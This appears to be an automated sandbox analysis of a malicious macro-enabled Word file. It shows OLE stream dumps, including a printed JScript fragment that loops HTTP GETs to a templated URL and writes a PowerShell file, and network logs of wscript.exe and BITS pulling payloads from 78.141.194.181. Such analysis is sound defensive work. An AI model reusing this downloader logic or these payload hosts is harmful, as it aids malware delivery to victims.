                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
                  Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                  General
                  Stream Path:Macros/UserForm1/\x1CompObj
                  File Type:data
                  Stream Size:97
                  Entropy:3.61064918306
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                  General
                  Stream Path:Macros/UserForm1/\x3VBFrame
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:292
                  Entropy:4.57455623175
                  Base64 Encoded:True
                  Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 5 2 0 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 5 0 5 5 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                  Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                  Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94
                  General
                  Stream Path:Macros/UserForm1/f
                  File Type:data
                  Stream Size:94
                  Entropy:2.71126254613
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . } . . . " . . . # . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . { . . . . . . .
                  Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 d4 22 00 00 dd 23 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 1c 02 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 7b 02 00 00 d4 00 00 00
                  Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 540
                  General
                  Stream Path:Macros/UserForm1/o
                  File Type:data
                  Stream Size:540
                  Entropy:5.18432057045
                  Base64 Encoded:False
                  Data ASCII:. . . . ( . . . . . . . v a r o = W S c r i p t . C r e a t e O b j e c t ( " M S X M L 2 . X M L H T T P " ) ; . . v a r p s = ' % % P S % % . p s 1 ' . . w h i l e ( t r u e ) { . . o . O p e n ( ' G E T ' , ' % % U % % ' , 0 ) ; . . o . S e n d ( ) ; . . i f ( o . S t a t u s = = 2 0 0 ) { . . v a r s o = n e w A c t i v e X O b j e c t ( ' S c r i p t i n g . F i l e S y s t e m O b j e c t ' ) ; . . v a r f o = s
                  Data Raw:00 02 fc 01 28 00 00 00 e9 01 00 80 76 61 72 20 6f 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 76 61 72 20 70 73 20 3d 20 27 25 25 50 53 25 25 2e 70 73 31 27 0d 0a 77 68 69 6c 65 20 28 74 72 75 65 29 20 7b 0d 0a 20 20 20 20 6f 2e 4f 70 65 6e 28 27 47 45 54 27 2c 27 25 25 55 25 25 27 2c 30 29 3b
                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3258
                  General
                  Stream Path:Macros/VBA/_VBA_PROJECT
                  File Type:data
                  Stream Size:3258
                  Entropy:4.23605935534
                  Base64 Encoded:False
                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                  Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 825
                  General
                  Stream Path:Macros/VBA/dir
                  File Type:data
                  Stream Size:825
                  Entropy:6.51401324555
                  Base64 Encoded:True
                  Data ASCII:. 5 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . h . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . a .
                  Data Raw:01 35 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 aa 68 f6 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                  Stream Path: WordDocument, File Type: data, Stream Size: 4096
                  General
                  Stream Path:WordDocument
                  File Type:data
                  Stream Size:4096
                  Entropy:1.03818034246
                  Base64 Encoded:False
                  Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 ce 90 01 00 ce 90 01 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 20, 2021 10:30:47.770090103 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.820573092 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.820684910 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.825139046 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.875634909 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.876494884 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.876581907 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:49.941462994 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.507498026 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.557960033 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.558137894 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.561558008 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.611931086 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.612396002 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.642548084 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693434954 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693483114 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693521023 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693562984 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693572998 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693612099 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693643093 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693695068 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693721056 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693726063 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693743944 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693782091 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693820953 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693829060 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693866968 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693979979 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.744193077 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.744235039 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.744326115 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.746211052 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.746253967 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.746321917 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.749711990 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749752045 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749800920 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749847889 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749849081 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.752094984 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.753180027 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.753228903 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.753417015 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.756684065 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.756721973 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.756962061 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.760227919 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.760268927 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.761044979 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.763766050 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.763806105 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.765451908 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.767246962 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.767288923 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.768304110 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.770920992 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.770972967 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.771089077 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.774302006 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.774342060 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.777378082 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.794632912 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.794684887 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.795335054 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.796355963 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.796399117 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.796504974 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.799854994 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.799895048 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.800288916 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.802906990 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.802944899 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.802993059 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.803041935 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.803075075 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.803210020 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.806061029 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.806106091 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.806346893 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.809079885 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.809124947 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.809431076 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.812136889 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.812176943 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.812335968 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.815232992 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.815273046 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.817435980 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.818331957 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.818387032 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.819453955 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.821363926 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.821432114 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.821737051 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.824296951 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.824338913 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.824511051 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.827285051 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.867075920 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:50.600814104 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:50.600907087 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:50.601022959 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:50.651310921 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:32:26.449816942 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:26.555236101 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:26.555444956 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:26.612793922 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:26.695453882 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:26.739757061 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:26.816546917 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:26.818500996 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:26.936326027 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:26.936434984 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.013551950 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.053807020 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.168299913 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.209033966 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.305207014 CET4972580192.168.2.4216.239.32.21
                  Jan 20, 2021 10:32:27.345439911 CET8049725216.239.32.21192.168.2.4
                  Jan 20, 2021 10:32:27.345669985 CET4972580192.168.2.4216.239.32.21
                  Jan 20, 2021 10:32:27.346507072 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.483164072 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.483310938 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.561248064 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.602803946 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.679847956 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.680223942 CET4972580192.168.2.4216.239.32.21
                  Jan 20, 2021 10:32:27.719870090 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.720220089 CET8049725216.239.32.21192.168.2.4
                  Jan 20, 2021 10:32:27.831789970 CET8049725216.239.32.21192.168.2.4
                  Jan 20, 2021 10:32:27.831856012 CET8049725216.239.32.21192.168.2.4
                  Jan 20, 2021 10:32:27.832056046 CET4972580192.168.2.4216.239.32.21
                  Jan 20, 2021 10:32:27.834860086 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.934520960 CET4972580192.168.2.4216.239.32.21
                  Jan 20, 2021 10:32:27.967313051 CET804972445.67.229.125192.168.2.4
                  Jan 20, 2021 10:32:27.967499971 CET4972480192.168.2.445.67.229.125
                  Jan 20, 2021 10:32:27.974644899 CET8049725216.239.32.21192.168.2.4
                  Jan 20, 2021 10:32:28.123770952 CET804972445.67.229.125192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 20, 2021 10:30:38.375869989 CET5170353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:38.437462091 CET53517038.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:39.813987017 CET6524853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:39.875488997 CET53652488.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:41.119654894 CET5372353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:41.167717934 CET53537238.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:42.340919018 CET6464653192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:42.388814926 CET53646468.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:43.103338003 CET6529853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:43.151076078 CET53652988.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:46.207206011 CET5912353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:46.255156040 CET53591238.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:47.952367067 CET5453153192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:48.000474930 CET53545318.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:49.031301975 CET4971453192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:49.084433079 CET53497148.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:50.229558945 CET5802853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:50.277640104 CET53580288.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:51.352603912 CET5309753192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:51.408936977 CET53530978.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:52.496892929 CET4925753192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:52.557529926 CET53492578.8.8.8192.168.2.4
                  Jan 20, 2021 10:32:27.243122101 CET6238953192.168.2.48.8.8.8
                  Jan 20, 2021 10:32:27.302587032 CET53623898.8.8.8192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 20, 2021 10:32:27.243122101 CET192.168.2.48.8.8.80x7defStandard query (0)ifconfig.meA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.32.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.34.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.36.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.38.21A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • 78.141.194.181
                  • 45.67.229.125
                  • ifconfig.me

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44971578.141.194.18180C:\Windows\SysWOW64\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:30:47.825139046 CET180OUTGET /d569872345345.txt HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: 78.141.194.181
                  Connection: Keep-Alive
                  Jan 20, 2021 10:30:47.876494884 CET181INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:30:47 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Fri, 25 Dec 2020 16:29:47 GMT
                  ETag: "5a7-5b74c6eccbba7-gzip"
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 772
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00
                  Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)LSyE;V:,;Xk;7F39jkrtEp`M=7ar[I)F);WM$0>'<7qef<Md6O|[|LW^7d[2[6?&tu2++Mw_HgM7}{,^hB-V0Q|o(bt~.`Gz7`#B`x4L=HXjRm.BXVxG5I5*C'MuYRCGemFVnRT&4KR`g@\(*,]6r


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44972378.141.194.18180C:\Windows\SysWOW64\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:31:45.561558008 CET256OUTHEAD /s34987435987.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  User-Agent: Microsoft BITS/7.8
                  Host: 78.141.194.181
                  Jan 20, 2021 10:31:45.612396002 CET256INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:31:45 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Wed, 23 Dec 2020 13:46:16 GMT
                  ETag: "12932-5b721ea4eff8d"
                  Accept-Ranges: bytes
                  Content-Length: 76082
                  Vary: Accept-Encoding
